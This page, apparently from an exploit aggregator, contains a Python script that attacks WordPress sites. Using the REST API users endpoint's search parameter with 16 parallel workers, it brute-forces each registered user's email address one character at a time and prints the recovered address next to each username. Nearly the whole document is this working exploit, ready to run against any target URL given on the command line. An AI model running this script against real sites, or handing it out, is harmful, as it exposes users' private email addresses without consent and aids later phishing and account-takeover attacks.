Share
## https://sploitus.com/exploit?id=WPEX-ID:19380917-4C27-4095-ABF1-EBA6F913B441
from multiprocessing import Pool
import requests
import string
import json
import sys


if len(sys.argv) != 2:
 print(f'USAGE: {sys.argv[0]} <target site root url>')
 sys.exit()

url = sys.argv[1].rstrip('/') + '/wp-json/wp/v2/users'

known_users = {}
user_suffixes = []
current_suffix = '@'
headers = { 'Content-Type': 'application/json', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10136' }

def bruteforce_search(txt):
 users = json.loads(requests.get(url, headers=headers, data=json.dumps({'search':txt})).text)
 return (txt, users)



if __name__ == '__main__':
 # String comparisons in the DB are case-insensitive, so don't bother with uppercase letters
 dic = string.ascii_lowercase + string.digits + '!#$&\'+\/=?^_`{|}~\.-]+'
 p = Pool(16)

 users = json.loads(requests.get(url).text)

 # Initial round: Grab all users by their first email domain's character
 suffixes = [current_suffix + c for c in dic]

 for suffix, users in p.imap(bruteforce_search, suffixes):
  if len(users) > 0:
   print(users)
   for user in users:
    slug = user['slug']
    print(f'# Added user: {slug}, suffix: {suffix}')
    known_users[user['slug']] = suffix

 # Iterate through all users
 for user in known_users:
  print(f'# Bruteforcing email domain for {user}..')
  foundSomething = True
  while foundSomething:
   foundSomething = False
   suffixes = [known_users[user] + c for c in dic]
   for suffix, users_found in p.imap(bruteforce_search, suffixes):
    for user_found in users_found:
     if user_found['slug'] == user:
      print(suffix)
      known_users[user] = suffix
      foundSomething = True
      break

 for user in known_users:
  print(f'# Bruteforcing email ID for {user}..')
  foundSomething = True
  while foundSomething:
   foundSomething = False
   suffixes = [c + known_users[user] for c in dic]
   for suffix, users_found in p.imap(bruteforce_search, suffixes):
    for user_found in users_found:
     if user_found['slug'] == user:
      print(suffix)
      known_users[user] = suffix
      foundSomething = True
      break

 print('# Found the following:')
 for user in known_users:
  email = known_users[user]
  print(f'{user} => {email}')